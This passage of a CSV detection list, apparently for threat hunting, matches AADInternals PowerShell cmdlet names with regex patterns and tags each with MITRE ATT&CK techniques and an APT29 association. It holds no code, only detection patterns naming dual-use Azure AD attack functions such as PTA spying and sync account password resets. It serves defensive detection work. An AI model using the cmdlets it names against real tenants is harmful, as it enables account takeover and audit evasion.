TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Read-AADIntConfiguration*",".{0,1000}Read\-AADIntConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Register-AADIntHybridHealthServiceAgent*",".{0,1000}Register\-AADIntHybridHealthServiceAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Register-AADIntMFAApp*",".{0,1000}Register\-AADIntMFAApp.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Register-AADIntProxyAgent*",".{0,1000}Register\-AADIntProxyAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - 
T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Register-AADIntPTAAgent*",".{0,1000}Register\-AADIntPTAAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Register-AADIntSyncAgent*",".{0,1000}Register\-AADIntSyncAgent.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntAccessDeviceFromIntune*",".{0,1000}Remove\-AADIntAccessDeviceFromIntune.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Remove-AADIntAzureDiagnosticSettings*",".{0,1000}Remove\-AADIntAzureDiagnosticSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntDeviceFromAzureAD*",".{0,1000}Remove\-AADIntDeviceFromAzureAD.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntForceNTHash*",".{0,1000}Remove\-AADIntForceNTHash.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntHybridHealthService*",".{0,1000}Remove\-AADIntHybridHealthService.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntHybridHealthServiceMember*",".{0,1000}Remove\-AADIntHybridHealthServiceMember.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntMSPartnerDelegatedAdminRoles*",".{0,1000}Remove\-AADIntMSPartnerDelegatedAdminRoles.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntPTASpy*",".{0,1000}Remove\-AADIntPTASpy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntRolloutPolicy*",".{0,1000}Remove\-AADIntRolloutPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 
- T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntRolloutPolicyGroups*",".{0,1000}Remove\-AADIntRolloutPolicyGroups.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Remove-AADIntTeamsMessages*",".{0,1000}Remove\-AADIntTeamsMessages.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Restore-AADIntADFSAutoRollover*",".{0,1000}Restore\-AADIntADFSAutoRollover.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Search-AADIntTeamsUser*",".{0,1000}Search\-AADIntTeamsUser.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals 
PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Search-AADIntUnifiedAuditLog*",".{0,1000}Search\-AADIntUnifiedAuditLog.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Send-AADIntEASMessage*",".{0,1000}Send\-AADIntEASMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Send-AADIntHybridHealthServiceEventBlob*",".{0,1000}Send\-AADIntHybridHealthServiceEventBlob.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Send-AADIntHybridHealthServiceEvents*",".{0,1000}Send\-AADIntHybridHealthServiceEvents.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Send-AADIntOneDriveFile*",".{0,1000}Send\-AADIntOneDriveFile.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Send-AADIntOutlookMessage*",".{0,1000}Send\-AADIntOutlookMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Send-AADIntTeamsMessage*",".{0,1000}Send\-AADIntTeamsMessage.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntADFSConfiguration*",".{0,1000}Set\-AADIntADFSConfiguration.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntADFSPolicyStoreRules*",".{0,1000}Set\-AADIntADFSPolicyStoreRules.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntADSyncAccountPassword*",".{0,1000}Set\-AADIntADSyncAccountPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntADSyncEnabled*",".{0,1000}Set\-AADIntADSyncEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - 
T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntAzureADFeature*",".{0,1000}Set\-AADIntAzureADFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntAzureADPolicyDetail*",".{0,1000}Set\-AADIntAzureADPolicyDetail.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntAzureRoleAssignment*",".{0,1000}Set\-AADIntAzureRoleAssignment.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDesktopSSO*",".{0,1000}Set\-AADIntDesktopSSO.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD 
and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDesktopSSOEnabled*",".{0,1000}Set\-AADIntDesktopSSOEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDeviceCompliant*",".{0,1000}Set\-AADIntDeviceCompliant.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDeviceRegAuthMethods*",".{0,1000}Set\-AADIntDeviceRegAuthMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
"*Set-AADIntDeviceTransportKey*",".{0,1000}Set\-AADIntDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDeviceWHfBKey*",".{0,1000}Set\-AADIntDeviceWHfBKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntDiagnosticSettingsDetails*",".{0,1000}Set\-AADIntDiagnosticSettingsDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntEASSettings*",".{0,1000}Set\-AADIntEASSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation 
tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntOfficeUpdateBranch*",".{0,1000}Set\-AADIntOfficeUpdateBranch.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntPassThroughAuthentication*",".{0,1000}Set\-AADIntPassThroughAuthentication.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntPasswordHashSyncEnabled*",".{0,1000}Set\-AADIntPasswordHashSyncEnabled.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntProxySettings*",".{0,1000}Set\-AADIntProxySettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - 
T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntPTACertificate*",".{0,1000}Set\-AADIntPTACertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntRolloutPolicy*",".{0,1000}Set\-AADIntRolloutPolicy.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntSelfServicePurchaseProduct*",".{0,1000}Set\-AADIntSelfServicePurchaseProduct.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntSetting*",".{0,1000}Set\-AADIntSetting.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for 
administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntSPOSiteMembers*",".{0,1000}Set\-AADIntSPOSiteMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntSPOUserProperty*",".{0,1000}Set\-AADIntSPOUserProperty.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" "*Set-AADIntSyncFeature*",".{0,1000}Set\-AADIntSyncFeature.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z" 
